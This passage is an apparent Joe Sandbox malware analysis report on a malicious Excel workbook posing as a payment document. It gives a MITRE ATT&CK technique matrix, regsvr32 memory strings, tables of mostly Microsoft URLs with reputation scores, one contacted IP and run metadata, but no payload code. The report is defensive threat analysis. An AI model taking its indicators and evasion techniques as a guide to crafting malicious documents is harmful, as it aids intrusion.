    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: regsvr32.exe, 0000000F.00000002.295096304.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: regsvr32.exe, 0000000F.00000002.295096304.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: regsvr32.exe, 0000000F.00000002.295096304.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: regsvr32.exe, 0000000F.00000002.295096304.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: Yara matchFile source: app.xml, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1DLL Side-Loading1Process Injection1Regsvr321OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution21Boot or Logon Initialization ScriptsDLL Side-Loading1Masquerading1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%VirustotalBrowse
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%VirustotalBrowse
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.com32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
      high
      https://login.microsoftonline.com/32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
        high
        https://shell.suite.office.com:144332D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
            high
            https://autodiscover-s.outlook.com/32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
              high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                high
                https://cdn.entity.32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/query32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                  high
                  https://clients.config.office.net/user/v1.0/tenantassociationkey32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                      high
                      https://powerlift.acompli.net32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.com32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v132D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                        high
                        https://cortana.ai32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspx32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.com32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                  high
                                  https://api.aadrm.com/32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                    high
                                    https://api.microsoftstream.com/api/32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                        high
                                        https://cr.office.com32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                          high
                                          https://portal.office.com/account/?ref=ClientMeControl32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                            high
                                            https://graph.ppe.windows.net32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                            high
                                                            https://graph.windows.net32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.com32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                high
                                                                                                https://api.office.net32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                    • 0%, Virustotal, Browse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/log32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorize32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v232D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/mac32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.ai32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.com32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                                              • 0%, Virustotal, Browse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devices32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorize32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://staging.cortana.ai32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://loki.delve.office.com/api/v1/configuration/officewin32/32D16877-2932-4116-B7E2-AF8660BF4045.0.drfalse
                                                                                                                                                    high

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    185.180.199.125
                                                                                                                                                    unknownNetherlands
                                                                                                                                                    14576HOSTING-SOLUTIONSUSfalse

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                    Analysis ID:439080
                                                                                                                                                    Start date:23.06.2021
                                                                                                                                                    Start time:17:14:27
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 5m 28s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:INDIV_PAYM_633854-324967143.xlsb
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Number of analysed new started processes analysed:29
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal56.expl.evad.winXLSB@3/9@0/1
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xlsb
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, SearchUI.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 20.82.210.154, 93.184.220.29, 52.255.188.83, 13.88.21.125, 204.79.197.200, 13.107.21.200, 23.211.6.115, 52.109.76.68, 52.109.88.40, 23.35.236.56, 13.107.5.88, 13.107.42.23, 173.222.108.210, 173.222.108.226, 20.50.102.62, 80.67.82.235, 80.67.82.211, 40.112.88.60, 20.82.209.183, 20.54.104.15, 20.54.7.98
